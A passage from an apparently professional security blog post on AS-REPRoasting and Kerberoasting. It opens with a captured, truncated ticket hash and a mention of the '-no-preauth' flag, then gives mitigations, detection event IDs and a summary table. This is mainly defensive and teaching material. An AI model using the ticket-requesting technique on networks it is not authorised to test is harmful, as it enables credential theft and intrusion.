434a4b69984a736ae46139d9d519fe4eaf6236b3bcb4c82135616864f77f61e23ba94ff0832a8b8bcc1b59ed6c3463ab5caa1ba691339fba49033af4516a5c32ae7960c1874defa02febc4d069208c18f0d69f9ca154a3c726d3950e1e5c3aede95e045ee97c8a617c4b2518663864cf732c56607a5f8f24691c328d8c4122cc26b10497d7a5677eaf3d1dfa30f45e8e8e8f3438875f232e239d74992a3e2a30d63a430491c27705c7abeeeaa74392131842c2212f5911e0e8af06f8bab724f206f3ab93ddf151c95bfb7d797a9c09dd327e0705893c70ebe70e6b677d37ebd93b2a9ad3405f9144755fefb2f6470e00992e41702c561105f1732ef5f45546f1d87c770f15c0e9cdcaa1c553184be23a8786a6259c20a495e0d1789ddb0f21aec0316f0e07c770cc625a70f8e6f8aed6e783f7262a34164675472fccecc4e91d89e5cd93b85f1bf88ce6bee36730f15f823876435662d62028b7b7554329912bc44f53aca675d8637077bc1488bda834659cd80781f000e82ef974a1d272f9559b32db2ad86a96a67b5a1d484416ddc8c8fcec3a53c4608322e8 [...SNIP...] |
Brilliant! Now we have a service ticket that we can try to crack without first needing to have valid user credentials. The only real difference between this and the previous command is the -no-preauth flag, which takes the name of the account that does not require Kerberos pre-authentication.
Mitigation
Knowing the attack is great, but that doesn’t do our customers any good. So how do we mitigate this?
AS-REPRoasting
AS-REPRoasting is categorized in the MITRE ATT&CK Framework underneath “Steal or Forge Kerberos Tickets”, with technique ID T1558.004.
To mitigate the risk associated with AS-REPRoasting, we recommend the following measures:
- Require Kerberos pre-authentication to the maximum extent possible. Pre-authentication is enabled by default; if it is necessary to disable pre-authentication, ensure that a strong password is set for the user.
- Enable AES Kerberos encryption rather than RC4 wherever possible. Attackers generally prefer RC4 because it is much easier to crack than AES. Although requiring AES may not necessarily prevent AS-REPRoasting from occurring, it will make it easier to detect.
Kerberoasting
Kerberoasting is also categorized in MITRE ATT&CK under “Steal or Forge Kerberos Tickets”, with the technique ID T1558.003.
To mitigate Kerberoasting, we recommend the following:
- Enable AES encryption for all Kerberos requests and limit the use of RC4 as much as possible.
- Consider implementing Group Managed Service Accounts (gMSAs) rather than configuring user accounts with SPNs to run services. This will go a long way to mitigating the use of weak passwords. Unlike normal user accounts, gMSAs are managed by Active Directory and their passwords are randomly generated and automatically rotated every 30 days. If implementing gMSAs is not possible, ensure strong passwords are set for all accounts…especially those configured with SPNs used to run services.
- Adhere to the principle of least privilege and restrict service accounts to the lowest possible privilege level.
Detections
Detections methods for these attacks include:
- Monitor for anomalous activity, particularly accounts making a high number of Kerberos ticket requests in a small amount of time. Microsoft Event IDs 4768 (A Kerberos authentication ticket (TGT) was requested) and 4769 (A Kerberos service ticket was requested) should be monitored.
- Look for requests made using RC4 encryption (type 0x17). This is a reasonable indicator of a potential attack, but it should be noted that there might still be times when Windows uses RC4. If the environment is configured to use AES for tickets, then the use of RC4 should stand out and be investigated.
- Consider the use of honey accounts. An example of this could be a legitimate-looking account configured with an SPN that isn’t used for anything. If you go this route, make sure a very strong password is set. Any service ticket requests for this account should be considered a high-fidelity indicator of an attack and should absolutely be investigated.
Summary
AS-REPRoasting and Kerberoasting are two common Kerberos ticket attacks. The misconfigurations that allow these attacks could have serious implications on their own, but the combination of the two attacks could be especially bad because the presence of a user account that does not require Kerberos pre-authentication removes the requirement for an attacker to have valid user credentials before being able to request service tickets.
The following table highlights the key components of each attack, their requirements, and their mitigations:
| Attack | Misconfiguration | Requirements | Mitigations |
| AS-REPRoasting | User accounts configured to not require Kerberos pre-authentication | Network access | Require Kerberos pre-authentication for all accounts whenever possible. If it is necessary for an account to be configured without pre-authentication, ensure a very strong password is set for the account.
Restrict the use of RC4 encryption as much as possible. This will make ticket requests that use RC4 stand out more to defenders. |
| Kerberoasting | User accounts configured with SPNs being used to run services | Network access and valid domain account credentials | Limit the use of RC4 as much as possible.
Consider using gMSAs where possible instead of configuring user accounts with SPNs
Adhere to the principle of least privilege for all service accounts |
Next time you’re stuck on a test, and you’ve identified an AS-REPRoastable user, consider Kerberoasting service accounts through that user. You may get lucky if those service accounts are configured with weak passwords, and then you’re off to the movies!
